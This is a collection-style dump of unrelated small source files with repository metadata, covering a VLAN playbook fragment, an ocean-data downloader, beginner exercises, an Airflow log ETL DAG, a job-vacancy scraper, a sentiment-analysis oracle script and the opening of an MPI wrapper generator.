task.add_vlan()
task.admin_state = 'down'
task.delay = 20
task.interfaces = ['Ethernet1/11', 'Ethernet1/12']
task.name = "my_vlan_2003"
task.mapped_vni = 20003
task.state = 'present'
task.vlan_id = 2003
task.vlan_state = 'active'
task.add_vlan()
task.task_name = 'aggregate vlans'
task.commit()
pb.add_task(task)
pb = playbook()
add_task(pb)
add_aggregate_task(pb)
pb.append_playbook()
pb.write_playbook()
log.info('wrote playbook {}'.format(pb.file))
|
allenrobel/ask
|
unit_test/cisco/nxos/unit_test_nxos_vlan.py
|
unit_test_nxos_vlan.py
|
py
| 1,944 |
python
|
en
|
code
| 2 |
github-code
|
6
|
22461213731
|
import xarray as xr
import numpy as np
#Este script baixa os dados do hycom para os períodos selecionados para o experimento GLBv0.08/expt_53.X
#Importante: Por conta da estruturas dos servidores OpenDAP, e preciso baixar o dado por cada passo de tempo para postriormente concaternar
#Para concatenar, selecionar os arquivos desejados e utilizar o CDO, portando, este processamento é melhor realizado numa máquina Linux.
#Comando: cdo cat <*.nc> <saidamodeloteste.nc>
expt = ['http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_56.3',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_57.2',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_57.7',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_92.8',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_92.9',
'http://tds.hycom.org/thredds/dodsC/GLBv0.08/expt_93.0',
]
#Parametros de entrada - Lembrando que as coordenadas deve ser passadas em WGS84 graus decimais
x = -73.575979
y = 11.552520
prof_ini = 0
prof_max = 1000
#Opcao para exportar area ao redor do ponto
#celulas ao redor. 0 para extrair apenas a localização mais proxima ao ponto
cell = 2
area = 0 + cell
for ex in expt:
hycom = xr.open_dataset(ex,decode_times=False,decode_cf=False)
if '_9' in ex:
hycom['lon'] = hycom.lon-360
#extraindo area ou pontos do HYCOM
if area ==0:
hycom = hycom.sel(lon=x, lat=y,method='nearest')
hycom = hycom.sel(depth = slice(prof_ini,prof_max))
if area >0:
#matriz de distancias
dist = ((hycom.lon-x)**2 + (hycom.lat-y)**2)**0.5
#procurar pelo indice do modelo com as coordenadas mais proximas ao dado
ind = np.unravel_index(np.argmin(dist, axis=None), dist.shape)
hycom = hycom.isel(lon=slice(ind[0]-area,ind[0]+area), lat=slice(ind[1]-area,ind[1]+area))
hycom = hycom.sel(depth = slice(prof_ini,prof_max))
#dropando informações nao necessarias
hycom = hycom.drop(['tau','surf_el','water_temp_bottom','salinity_bottom','water_u_bottom','water_v_bottom'])
for i in list(range(0,len(hycom.time))):
try:
hyc = hycom.isel(time = i)
hyc = hyc.load()
hyc.to_netcdf('Hycom_Expt{}_{}.nc'.format(ex[-4:],i))
except:
pass
|
Igoratake/Hycom_Opendap
|
baixa_hycom_2014_frente_Pontual.py
|
baixa_hycom_2014_frente_Pontual.py
|
py
| 2,248 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
73789786749
|
valores = [[],[]]
for n in range(0,7):
v = int(input('digite um valor: '))
if v%2==0:
valores[0].append(v)
elif v%2!=0:
valores[1].append(v)
valores[0].sort()
valores[1].sort()
print(f'os valores pares foram: {valores[0]}' )
print(f'os valores impares foram: {valores[1]}' )
|
Kaue-Marin/Curso-Python
|
pacote dowlond/curso python/exercicio85.py
|
exercicio85.py
|
py
| 302 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
71971288509
|
from kubeflow.fairing.cloud.docker import get_docker_secret
from kubeflow.fairing.constants import constants
import json
import os
def test_docker_secret_spec():
os.environ["DOCKER_CONFIG"] = "/tmp"
config_dir = os.environ.get('DOCKER_CONFIG')
config_file_name = 'config.json'
config_file = os.path.join(config_dir, config_file_name)
with open(config_file, 'w+') as f:
json.dump({'config': "config"}, f)
docker_secret = get_docker_secret()
assert docker_secret.metadata.name == constants.DOCKER_CREDS_SECRET_NAME
os.remove(config_file)
|
kubeflow/fairing
|
tests/unit/cloud/test_docker.py
|
test_docker.py
|
py
| 578 |
python
|
en
|
code
| 336 |
github-code
|
6
|
69894822589
|
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
import datetime as dt
from airflow.utils.dates import days_ago
default_args = {
'owner': 'gregh',
'start_date': days_ago(0),
'email': ['[email protected]'],
'email_on_failure': True,
'email_on_retry': True,
'retries': 2,
'retry_delay': dt.timedelta(minutes=5)
}
dag = DAG(
dag_id='process_web_log',
schedule_interval=dt.timedelta(days=1),
default_args=default_args,
description='Airflow Web Log Daily Processor'
)
extract_data = BashOperator(
task_id='extract',
bash_command='cut -d "-" -f1 /home/project/airflow/dags/capstone/accesslogs.txt > /home/project/airflow/dags/capstone/extracted_data.txt',
dag=dag
)
transform_data = BashOperator(
task_id='transform',
bash_command='sed "/198.46.149.143/d" /home/project/airflow/dags/capstone/extracted_data.txt > /home/project/airflow/dags/capstone/transformed_data.txt',
dag=dag
)
load_data = BashOperator(
task_id='load',
bash_command='tar -cvf /home/project/airflow/dags/capstone/weblog.tar /home/project/airflow/dags/capstone/transformed_data.txt',
dag=dag
)
extract_data >> transform_data >> load_data
|
gregh13/Data-Engineering
|
Projects/Capstone Project/Task 5/Part Two - Apache Airflow ETL/process_web_log.py
|
process_web_log.py
|
py
| 1,221 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21354655285
|
#
# @lc app=leetcode.cn id=438 lang=python3
#
# [438] 找到字符串中所有字母异位词
#
# @lc code=start
class Solution:
def findAnagrams(self, s: str, p: str) -> List[int]:
def s2vec(s):
vec = [0]*26
for c in s:
vec[ord(c)-ord('a')] += 1
return tuple(vec)
pvec = s2vec(p)
n = len(s)
b = 0
e = len(p)-1
if e>n:
return []
tvec = list(s2vec(s[b:e+1]))
ans = []
while e<n:
if tuple(tvec) == pvec:
ans.append(b)
tvec[ord(s[b])-ord('a')] -= 1
if e+1 == n:
break
tvec[ord(s[e+1])-ord('a')] += 1
b += 1
e += 1
return ans
# @lc code=end
|
Alex-Beng/ojs
|
FuckLeetcode/438.找到字符串中所有字母异位词.py
|
438.找到字符串中所有字母异位词.py
|
py
| 801 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72056615229
|
spend_data = open("env_spending_ranks.csv")
ranks = [[] for _ in range(5)]
for i, line in enumerate(spend_data):
if i == 0:
continue
else:
temp = line.strip().split(',')
for j, element in enumerate(temp):
if j % 3 == 0:
ranks[j//3].append(element)
# 0: 2011, 4: 2015
ranks.reverse()
for year in ranks:
print(year)
states = []
state_rank_change = [0 for _ in range(50)]
for state in ranks[0]:
states.append(state)
states.sort()
yearly_ranks = [[0 for _ in range(50)] for _ in range(5)]
print(states)
for i, year in enumerate(ranks):
for j, state in enumerate(year):
for s, entry in enumerate(states):
if state == entry:
yearly_ranks[i][s] = j
differences = [0 for _ in range(50)]
for year in yearly_ranks:
print(year)
for i in range(50):
for j in range(1, 5):
diff = yearly_ranks[j-1][i] - yearly_ranks[j][i]
differences[i] += diff
# print(differences)
for_output = []
for i in range(50):
temp_str = states[i] + ": " + str(differences[i])
for_output.append(temp_str)
for out in for_output:
print(out)
spend_data.close()
|
jamesryan094/us_aqi_data_wrangling
|
ranks_per_year.py
|
ranks_per_year.py
|
py
| 1,172 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20444657924
|
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import time
import csv
class Scraper:
def __init__(self, url):
self.driver = webdriver.Chrome("./chromedriver", options=self.set_chrome_options())
self.url = url
self.open_url()
self.content = self.get_content()
def set_chrome_options(self):
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-gpu")
return chrome_options
def open_url(self):
self.driver.get(self.url)
def get_content(self):
content = self.driver.page_source
soup = BeautifulSoup(content, "html.parser")
return soup
# retrieves all elements with a chosen html tag
def get_all_tags(self, tag="h1"):
all_tags = []
for element in self.content.select(tag):
all_tags.append(element.text.strip())
return all_tags
def get_items(self, product_container='div.thumbnail'):
top_items = []
products = self.content.select(product_container)
for elem in products:
title = elem.select('h4 > a.title')[0].text
review_label = elem.select('div.ratings')[0].text
info = {
"title": title.strip(),
"review": review_label.strip()
}
top_items.append(info)
print(top_items)
# return(top_items)
def get_all_products(self, content_container='div.thumbnail'):
all_products = []
products = self.content.select(content_container)
for product in products:
name = product.select('h4 > a')[0].text.strip()
description = product.select('p.description')[0].text.strip()
price = product.select('h4.price')[0].text.strip()
reviews = product.select('div.ratings')[0].text.strip()
image = product.select('img')[0].get('src')
all_products.append({
"name": name,
"description": description,
"price": price,
"reviews": reviews,
"image": image
})
# print(all_products)
return all_products
def quit(self):
self.driver.quit()
def save_product_csv(self, all_products):
keys = all_products[0].keys()
with open('products.csv', 'w', newline='') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(all_products)
if __name__ == "__main__":
urls = [
"https://webscraper.io/test-sites/e-commerce/allinone",
"https://webscraper.io/test-sites/e-commerce/allinone/computers",
"https://webscraper.io/test-sites/e-commerce/allinone/computers/laptops",
"https://webscraper.io/test-sites/e-commerce/allinone/computers/tablets",
"https://webscraper.io/test-sites/e-commerce/allinone/phones",
"https://webscraper.io/test-sites/e-commerce/allinone/phones/touch"
]
start_time = time.time()
for url in urls:
scraper = Scraper(url)
print("products:", scraper.get_all_products())
scraper.quit()
total_time = time.time() - start_time
print("time:", total_time)
|
RasbeeTech/Web-Scraper
|
scraper.py
|
scraper.py
|
py
| 3,381 |
python
|
en
|
code
| 1 |
github-code
|
6
|
6606609236
|
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
candirow = len(matrix) - 1
for row in range(len(matrix)):
if(matrix[row][0] > target):
if(row == 0):
return False
candirow = row - 1
break
elif(matrix[row][0] == target):
return True
for i in range(1, len(matrix[0])):
if(matrix[candirow][i] == target):
return True
if(matrix[candirow][i] > target):
return False
|
JeongGod/Algo-study
|
leehyowonzero/12week/search-a-2d-matrix.py
|
search-a-2d-matrix.py
|
py
| 603 |
python
|
en
|
code
| 7 |
github-code
|
6
|
19705123014
|
# -*- coding: utf-8 -*-
case = 0
while True:
N, Q = [int(x) for x in input().split()]
if not Q and not N:
break
case += 1
print(f"CASE# {case}:")
marbles = []
for _ in range(N):
marbles.append(int(input()))
marbles.sort()
for i in range(Q):
finding = int(input())
print(f"{finding} found at {marbles.index(finding) + 1}" if finding in marbles
else f"{finding} not found")
|
caioopra/4o-Semestre-CCO
|
paradigmas/2-python_multiparadigma/atividade2/1025.py
|
1025.py
|
py
| 526 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43216721070
|
import os
import shlex
import subprocess
import numpy as np
import pandas as pd
from SentiCR.SentiCR.SentiCR import SentiCR
def clean_data(df):
df = df.copy()
# fill all rows with corresponding discussion link
df[df['discussion_link'] == ""] = np.NaN
df['discussion_link'] = df['discussion_link'].fillna(method='ffill')
# keep only analyzed comments
df = df[df['comment_ok'].notnull()]
# identify contributors' comments
df['contributor_comment'] = df['removed'].str.contains("contributor's comment")
# save dataframe
df_complete = df.copy()
# remove all rows where change_ok is different than 'yes' or 'no'
df = df[(df['change_ok'] == 'yes') | (df['change_ok'] == 'no')]
# concatenate all answers to a discussion, as well as the last answer in the discussion, in a column
answers = []
last_answers = []
last_answer_is_from_contributor = []
for index, row in df.iterrows():
row_answers = df_complete[(df_complete['discussion_link'] == row['discussion_link']) &
(df_complete['filename'] == row['filename']) &
(df_complete['commented_line'] == row['commented_line']) &
(df_complete['comment'] != row['comment'])]
if not row_answers.empty:
last_answers.append(row_answers['comment'].iloc[-1])
last_answer_is_from_contributor.append(row_answers['contributor_comment'].iloc[-1])
else:
last_answers.append(np.NaN)
last_answer_is_from_contributor.append(np.NaN)
answers.append(' '.join(row_answers['comment']))
df['answers'] = answers
df['last_answer'] = last_answers
df['last_answer_is_from_contributor'] = last_answer_is_from_contributor
# keep only one instance per discussion
df = df.drop_duplicates(subset=['discussion_link', 'filename', 'method_signature', 'commented_line'], keep='first')
# discard rows without answers
df = df[df['answers'].str.len() > 0]
return df
def merge_and_clean_data(df, df_complete):
# fill all rows with corresponding discussion link
df[df['discussion_link'] == ""] = np.NaN
df['discussion_link'] = df['discussion_link'].fillna(method='ffill')
# keep only analyzed comments
df = df[df['comment_ok'].notnull()]
# remove all rows where change_ok is different than 'yes' or 'no'
df = df[(df['change_ok'] == 'yes') | (df['change_ok'] == 'no')]
# add original commented line to dataframe
for index, row in df.iterrows():
match = df_complete[(df_complete['url'] == row['discussion_link']) &
(df_complete['filename'] == row['filename']) &
(df_complete['message'] == row['comment'])]
if len(match) > 0:
df.loc[index, 'commented_line'] = match['original_line'].iloc[0]
# concatenate all answers to a discussion, as well as the last answer in the discussion, in a column
answers = []
last_answers = []
last_answer_is_from_contributor = []
for _, row in df.iterrows():
row_answers = df_complete[(df_complete['url'] == row['discussion_link']) &
(df_complete['filename'] == row['filename']) &
(df_complete['original_line'] == row['commented_line']) &
(df_complete['message'] != row['comment'])]
# sort by creation date
row_answers = row_answers.sort_values(by='created_at')
if not row_answers.empty:
last_answers.append(row_answers['message'].iloc[-1])
last_answer_is_from_contributor.append(row_answers['owner_id'].iloc[-1] == row_answers['user_id'].iloc[-1])
else:
last_answers.append(np.NaN)
last_answer_is_from_contributor.append(np.NaN)
answers.append(' '.join(row_answers['message']))
df['answers'] = answers
df['last_answer'] = last_answers
df['last_answer_is_from_contributor'] = last_answer_is_from_contributor
# keep only one instance per discussion
df = df.drop_duplicates(subset=['discussion_link', 'filename', 'method_signature', 'commented_line'], keep='first')
# discard rows without answers
df = df[df['answers'].str.len() > 0]
return df
def extract_polarity(df, strategy, sa_tool='sentistrength'):
# extract text to analyze depending on strategy
df[strategy] = df[strategy].replace(r'[\n\t\r]', ' ', regex=True).replace(r'\"', '', regex=True)
# run sentiment analysis
if sa_tool == 'sentistrength':
df.to_csv(f'{strategy}.tsv', sep='\t', columns=[strategy], index=True, header=False)
sentiment_analysis_process = subprocess.Popen(shlex.split('java uk/ac/wlv/sentistrength/SentiStrength '
f'sentidata {os.getcwd()}/SentiStrength-SE/ConfigFiles/ '
f'input ../{strategy}.tsv '
'annotateCol 2 overwrite '
'trinary'),
cwd="SentiStrength-SE/")
sentiment_analysis_process.communicate()
# read results
polarities = pd.read_csv(f'{strategy}.tsv', sep='\t',
names=['original_index', 'text', 'polarity_sentistrength'])
os.remove(f'{strategy}.tsv')
return df.merge(polarities, left_index=True, right_on='original_index')
else:
sentiment_analyzer = SentiCR()
df[f'polarity_senticr'] = df[strategy].apply(lambda x: sentiment_analyzer.get_sentiment_polarity(x)[0])
return df
def build_oracle():
df_all = clean_data(pd.read_csv('manual_analysis_all.csv'))
df_filtered = merge_and_clean_data(pd.read_csv('manual_analysis_filtered.csv'),
pd.read_csv('manual_analysis_filtered_complete.csv'))
# add polarity to dataframe (separately because indexes overlap)
df_all = extract_polarity(df_all, 'last_answer')
df_filtered = extract_polarity(df_filtered, 'last_answer')
df_all = extract_polarity(df_all, 'last_answer', 'senticr')
df_filtered = extract_polarity(df_filtered, 'last_answer', 'senticr')
# remove unnecessary columns
df_all = df_all.drop(['original_index', 'removed', 'commented_file'], axis=1)
df_filtered = df_filtered.drop(['can be identified as accepted'], axis=1)
# combine the two dataframes
df = pd.concat([df_all, df_filtered])
df.to_csv('oracle.csv', index=False)
return df
if __name__ == '__main__':
build_oracle()
|
saramangialavori/AutomatingCodeReview3.0
|
manual_inspection/build_oracle.py
|
build_oracle.py
|
py
| 6,785 |
python
|
en
|
code
| 0 |
github-code
|
6
|
18388623624
|
## Első feladat
for i in range(1,10):
print(1/i)
## Második feladat
hatvany=int(input("Kérem a hatvány alapot:"))
kitevo=int(input("Kérem a hatvány kitevőt:"))
hatvanyertek=(hatvany**kitevo)
print(hatvanyertek)
## Harmadik feladat
while True:
szam=int(input("Kérek egy pozitív számot: "))
if szam<=0:
print("Nem tudsz olvasni?? Pozitív szám!")
else:
print("Ügyes vagy!")
break
## Negyedik feladat
a=int(input("Kérem az első számot: "))
b=int(input("Kérek a második számot: "))
if a>b:
print("A két szám közötti távolság: "+str(-(b-a)))
else:
print("A két szám közötti távolság: "+str(-(a-b)))
## Negyedik feladat
|
matyast/estioraimunka
|
feladat.py
|
feladat.py
|
py
| 700 |
python
|
hu
|
code
| 0 |
github-code
|
6
|
43597436816
|
# string: ordered, ____, text representation
# init
from timeit import default_timer as timer
movie_name = "The murder on the orient express"
# single quote
fav_quote = 'That\'s what she said'
# print(fav_quote)
# double quote
fav_quote = "That's what she said"
# print(fav_quote)
quote = "Where should I go? \
To the left where nothing is right \
or to the right where nothing is left."
# print(quote)
# triple quote
quote = """Where should I go?
To the left where nothing is right
or to the right where nothing is left."""
# print(quote)
# indexing
movie_name = "The murder on the orient express"
# reverse string
# print(movie_name[::-1])
# slicing
# print(movie_name[4:10])
# print(movie_name[11:17])
# print(movie_name[-4])
# print(movie_name[9:3:-1])
# concate
greetings = "Good morning"
student_name = "John"
greetings = greetings + " " + student_name
# print(greetings)
# interation
# for char in student_name:
# if char == 'o':
# print("o in name")
# else:
# print("o not in name")
# print(char)
# check
# if 'o' in student_name:
# print('o in name')
# else:
# print('o not in name')
# white space
hello = " hello "
# print(hello.strip())
# upper lower
# print(hello.upper())
upper_hello = "HELLO"
# print(upper_hello.lower())
# startswith
akshit_email = "[email protected]"
aditya_name = "techbullsaditya"
anushka_name = "techbullsanushka"
# print(anushka_name.startswith("techbulls"))
# domain_name = [".com", ".in"]
# print(akshit_email.endswith(".com"))
# find
akshit_name = "akshit"
# print(akshit_name.find('s'))
# SHIT
s_index = akshit_name.find('s')
shit_name = akshit_name[s_index:]
upper_shit = shit_name.upper()
# print(upper_shit)
# print(akshit_name[akshit_name.find('s'):].upper())
# count
series_name = "The Woman in the House Across the Street from the Girl in the Window"
# print(series_name.count('the'))
# replace
# series_name = series_name.replace('the', 'anything')
# print(series_name)
# split
series_name_list = series_name.split(" ")
# print(series_name_list)
# join
series_name_join_with_comma = ",".join(series_name_list)
# print(series_name_join_with_comma)
# print(series_name.replace(" ", ","))
number_of_a = ['a'] * 100
# print(number_of_a)
# 01
start = timer()
a_join = "".join(number_of_a)
end = timer()
print(end-start)
# 02
start = timer()
a_join_using_loop = ""
for char_a in number_of_a:
a_join_using_loop += char_a
end = timer()
print(end-start)
# print(a_join)
# print(a_join_using_loop)
# % .format() f-string
name = "akshit"
greetings = "Good morning"
student_roll_no = 123
print(f"{greetings}, this is my name: {name} roll no: {student_roll_no}")
# print("{} yello {}".format(greetings, name))
# print(greetings + " " + name + " " + str(student_roll_no))
# print(1+student_roll_no)
|
akshitone/fy-mca-class-work
|
DivB/string.py
|
string.py
|
py
| 2,834 |
python
|
en
|
code
| 1 |
github-code
|
6
|
18757756190
|
import argparse
import cv2
# ArgParse é usado para captar argumentos passados na chamada do .py no CMD
ap = argparse.ArgumentParser()
# Aqui definimos a label do argumento esperado
ap.add_argument("-i", "--image", required=True,
help= "Path to the image")
# Criamos um dicionário que receberá os valores dos argumentos
# As chaves do dicionário serão as labels criadas no na definição do argumento
args = vars(ap.parse_args())
# A função vars() retorna os valores correspondente ao atributo __dict__ do objeto
# Aqui lemos a imagem que é acessada através do caminho no disco passado como argumento.
# Acessamos o valor em args usando como chave do dicionário args o mesmo valor que a definição do argumento
image = cv2.imread(args["image"])
print("width: {} pixels".format(image.shape[1]))
print("height: {} pixels".format(image.shape[0]))
print("channels: {}".format(image.shape[2]))
print("Matrix shape: {}".format(image.shape))
cv2.imshow("Image", image)
cv2.waitKey(0)
cv2.imwrite("newimage.jpg", image)
|
CarlosAlfredoOliveiraDeLima/Practical-Python-and-OpenCV-Book
|
01 - load_display_save.py
|
01 - load_display_save.py
|
py
| 1,041 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
6118401140
|
''' Урок 2. Парсинг HTML. BeautifulSoup, MongoDB
Необходимо собрать информацию о вакансиях на вводимую должность (используем input) с сайтов Superjob(необязательно) и HH(обязательно). Приложение должно анализировать несколько страниц сайта (также вводим через input).
Получившийся список должен содержать в себе минимум:
Наименование вакансии.
Предлагаемую зарплату (отдельно минимальную и максимальную).
Ссылку на саму вакансию.
Сайт, откуда собрана вакансия.
По желанию можно добавить ещё параметры вакансии (например, работодателя и расположение). Структура должна быть одинаковая для вакансий с обоих сайтов. Общий результат можно вывести с помощью dataFrame через pandas.
'''
from bs4 import BeautifulSoup as bs
import requests
import json
class HHscraper:
def __init__(self, start_url, headers, params):
self.start_url = start_url
self.start_headers = headers
self.start_params = params
self.info_vacance = []
def get_html_string(self, url, headers='', params=''):
try:
response = requests.get(url, headers=headers, params=params)
if response.ok:
return response.text
except Exception as e:
sleep(1)
print(e)
return None
@staticmethod
def get_dom(html_string):
return bs(html_string, "html.parser")
def run(self):
next_butten_hh = ''
while next_butten_hh != None:
if next_butten_hh == '':
html_string = self.get_html_string(self.start_url + '/search/vacancy', self.start_headers, self.start_params)
else:
html_string = self.get_html_string(next_butten_hh)
soup = HHscraper.get_dom(html_string)
vacance_list = soup.findAll('div', attrs={'class': 'vacancy-serp-item'})
self.get_info_from_element(vacance_list)
try:
next_butten_hh = self.start_url + soup.find('a', attrs={'data-qa': 'pager-next'}).attrs["href"]
except Exception as e:
next_butten_hh = None
def get_info_from_element(self, vacance_list):
for vacance in vacance_list:
vacance_data = {}
vacance_name = vacance.find('a', {'class': 'bloko-link'}).getText()
vacance_city = vacance.find('div', {'data-qa': 'vacancy-serp__vacancy-address'}).getText()
vacance_link = vacance.find('a', {'class': 'bloko-link'}).attrs["href"]
vacance_data['имя вакансии'] = vacance_name
vacance_data['город'] = vacance_city
vacance_data['ссылка на вакансию'] = vacance_link
vacance_data['источник'] = self.start_url
self.get_salary(vacance_data, vacance)
self.info_vacance.append(vacance_data)
def get_salary(self, vacance_data, vacance):
try:
vacance_salary = vacance.find('span', {'data-qa': 'vacancy-serp__vacancy-compensation'}).getText()
vacance_salary = vacance_salary.replace('\u202f', '').split()
if '–' in vacance_salary:
vacance_data['мин зарплата'] = float(vacance_salary[0])
vacance_data['макс зарплата'] = float(vacance_salary[2])
vacance_data['валюта'] = vacance_salary[-1]
elif 'от' in vacance_salary:
vacance_data['мин зарплата'] = float(vacance_salary[1])
vacance_data['валюта'] = vacance_salary[-1]
elif 'до' in vacance_salary:
vacance_data['макс зарплата'] = float(vacance_salary[1])
vacance_data['валюта'] = vacance_salary[-1]
except Exception as e:
vacance_data['зарплата'] = None
def save_info_vacance(self):
with open("vacancy_hh.json", 'w', encoding="utf-8") as file:
json.dump(self.info_vacance, file, indent=2, ensure_ascii=False)
class SJscraper:
def __init__(self, start_url, headers, params):
self.start_url = start_url
self.start_headers = headers
self.start_params = params
self.info_sj_vacance = []
def get_html_string(self, url, headers='', params=''):
try:
response = requests.get(url, headers=headers, params=params)
if response.ok:
return response.text
except Exception as e:
sleep(1)
print(e)
return None
@staticmethod
def get_dom(html_string):
return bs(html_string, "html.parser")
def run(self):
next_butten_sj = ''
while next_butten_sj != None:
if next_butten_sj == '':
html_string = self.get_html_string(self.start_url + "vacancy/search/", self.start_headers,
self.start_params)
else:
html_string = self.get_html_string(next_butten_sj)
soup = SJscraper.get_dom(html_string)
vacance_list = soup.findAll('div', attrs={'class': 'Fo44F QiY08 LvoDO'})
self.get_info_from_element(vacance_list)
try:
next_butten_sj = main_link_sj + soup.find('a', attrs={'class': 'f-test-button-dalshe'}).attrs["href"]
except Exception as e:
next_butten_sj = None
def get_info_from_element(self, vacance_list):
for vacancy in vacance_list:
vacancy_sj_data = {}
vacancy_sj_name = vacancy.find('a', {'class': 'icMQ_'}).getText()
# vacance_sj_city = vacancy.find('span', {'class': 'f-test-text-company-item-location _2LcRC _1_rZy dXrZh Ml4Nx'}).getText()
vacancy_sj_link = main_link_sj + vacancy.find('a', {'class': 'icMQ_'}).attrs["href"]
vacancy_sj_data['имя вакансии'] = vacancy_sj_name
# vacance_sj_city['город'] = vacance_sj_city
vacancy_sj_data['ссылка на вакансию'] = vacancy_sj_link
vacancy_sj_data['источник'] = self.start_url
self.get_salary(vacancy_sj_data, vacancy)
self.info_sj_vacance.append(vacancy_sj_data)
def get_salary(self, vacancy_sj_data, vacancy):
try:
vacancy_sj_salary = vacancy.find("span",
{'class': "_1OuF_ _1qw9T f-test-text-company-item-salary"}).getText()
if '—' in vacancy_sj_salary:
sal = vacancy_sj_salary.replace('\xa0', ' ').split()
if sal[0].isdigit() and sal[1].isdigit():
mim_sal = sal[0] + sal[1]
vacancy_sj_data['мин зарплата'] = float(mim_sal)
else:
vacancy_sj_data['мин зарплата'] = float(sal[0])
if sal[-3].isdigit() and sal[-2].isdigit():
max_sal = sal[-3] + sal[-2]
vacancy_sj_data['макс зарплата'] = float(max_sal)
else:
vacancy_sj_data['макс зарплата'] = float(sal[-3])
vacancy_sj_data['валюта'] = sal[-1]
elif 'По' in vacancy_sj_salary:
vacancy_sj_data['зарплата'] = "По договоренности"
vacancy_sj_data['валюта'] = None
elif 'от' in vacancy_sj_salary:
sal = vacancy_sj_salary.replace('\xa0', ' ').split()
if sal[1].isdigit() and sal[2].isdigit():
mim_sal = sal[1] + sal[2]
vacancy_sj_data['мин зарплата'] = float(mim_sal)
else:
vacancy_sj_data['мин зарплата'] = float(sal[1])
vacancy_sj_data['валюта'] = sal[-1]
elif 'до' in vacancy_sj_salary:
sal = vacancy_sj_salary.replace('\xa0', ' ').split()
if sal[1].isdigit() and sal[2].isdigit():
max_sal = sal[1] + sal[2]
vacancy_sj_data['макс зарплата'] = float(max_sal)
else:
vacancy_sj_data['макс зарплата'] = float(sal[1])
vacancy_sj_data['валюта'] = sal[-1]
else:
sal = vacancy_sj_salary.replace('\xa0', ' ').split()
if sal[0].isdigit() and sal[1].isdigit():
user_sal = sal[0] + sal[1]
vacancy_sj_data['макс зарплата'] = float(user_sal)
except:
vacancy_sj_data['зарплата'] = None
def save_info_vacance(self):
with open("vacancy_sj.json", 'w', encoding="utf-8") as file:
json.dump(self.info_sj_vacance, file, indent=2, ensure_ascii=False)
if __name__ == '__main__':
user_find = input('Введите вакансию: ')
#user_find = 'python'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"}
main_link_hh = "https://hh.ru"
params_main_hh = {"area": "1",
"fromSearchLine": "true",
"st": "searchVacancy",
"text": user_find,
"page": "0"}
scraper_hh = HHscraper(main_link_hh, headers, params_main_hh)
scraper_hh.run()
scraper_hh.save_info_vacance()
main_link_sj = "https://www.superjob.ru/"
params_sj = {"keywords": user_find,
"geo[t][0]": "4"}
scraper_sj = SJscraper(main_link_sj, headers, params_sj)
scraper_sj.run()
scraper_sj.save_info_vacance()
|
XYI7I/GeekBrains
|
AI/Method_collecting_Internet_data/Lesson2/lesson2.py
|
lesson2.py
|
py
| 10,254 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
21998861864
|
n=int(input())
arr=list(map(int,input().split()))
sof=0
sos=0
for i in range(n):
if(i<n//2):
sof+=arr[i]
else:
sos+=arr[i]
print(abs(sof-sos))
|
Lavanya18901/codemind-python
|
difference_between_sum_of_first_half_and_second_half_in_an_array.py
|
difference_between_sum_of_first_half_and_second_half_in_an_array.py
|
py
| 158 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71484733948
|
def is_finish(x, y):
return x == 4
l = list(range(4))
cnt = 0
a = set(range(10))
assert(len(a & set(l)) == 4)
print(*l)
cnt += 1
X, Y = map(int, input().split())
if is_finish(X, Y):
exit(0)
for i in range(4):
not_in = a - set(l)
for n in not_in:
tmpl = l[:]
tmpl[i] = n
assert(len(a & set(tmpl)) == 4)
print(*tmpl)
cnt += 1
assert(cnt <= 100)
tmpx, tmpy = map(int, input().split())
if is_finish(tmpx, tmpy):
exit(0)
if tmpx > X:
l = tmpl[:]
X, Y = tmpx, tmpy
break
elif tmpx < X:
break
else:
for j in range(i+1, 4):
tmpl = l[:]
tmpl[i], tmpl[j] = tmpl[j], tmpl[i]
assert(len(a & set(tmpl)) == 4)
print(*tmpl)
cnt += 1
assert(cnt <= 100)
tmpx, tmpy = map(int, input().split())
if is_finish(tmpx, tmpy):
exit(0)
if tmpx > X:
l = tmpl[:]
X, Y = tmpx, tmpy
break
else:
assert(0)
|
knuu/competitive-programming
|
yukicoder/yuki355.py
|
yuki355.py
|
py
| 1,137 |
python
|
en
|
code
| 1 |
github-code
|
6
|
31356164054
|
import os
import argparse
import re
import textwrap
default_mpi_function_list = [
"int MPI_Init(int *argc, char ***argv)",
"int MPI_Finalize(void)",
"int MPI_Comm_rank(MPI_Comm comm, int *rank)",
"int MPI_Comm_size(MPI_Comm comm, int *size)",
"int MPI_Send(const void *buf, int count, MPI_Datatype datatype, int dest, int tag, MPI_Comm comm)",
"int MPI_Recv(void *buf, int count, MPI_Datatype datatype, int source, int tag, MPI_Comm comm, MPI_Status *status)"
]
def extract_between(text, sub1, sub2, nth=1):
"""
extract a substring from text between two given substrings
sub1 (nth occurrence) and sub2 (nth occurrence)
arguments are case sensitive
"""
# prevent sub2 from being ignored if it's not there
if sub2 not in text.split(sub1, nth)[-1]:
return None
return text.split(sub1, nth)[-1].split(sub2, nth)[0]
def get_args_list(args_name, args_type, args_post):
d = {}
d["pargs"] = ""
d["args"] = ""
for idy,function_name in enumerate(args_name):
d["pargs"] += args_type[idy]
d["pargs"] += " "
d["pargs"] += args_name[idy]
d["pargs"] += args_post[idy]
d["pargs"] += ", "
d["args"] += args_name[idy]
d["args"] += ", "
if(len((d["pargs"])) > 0):
if(d["pargs"][-2] == ','):
d["pargs"] = d["pargs"][:-2]
if(d["args"][-2] == ','):
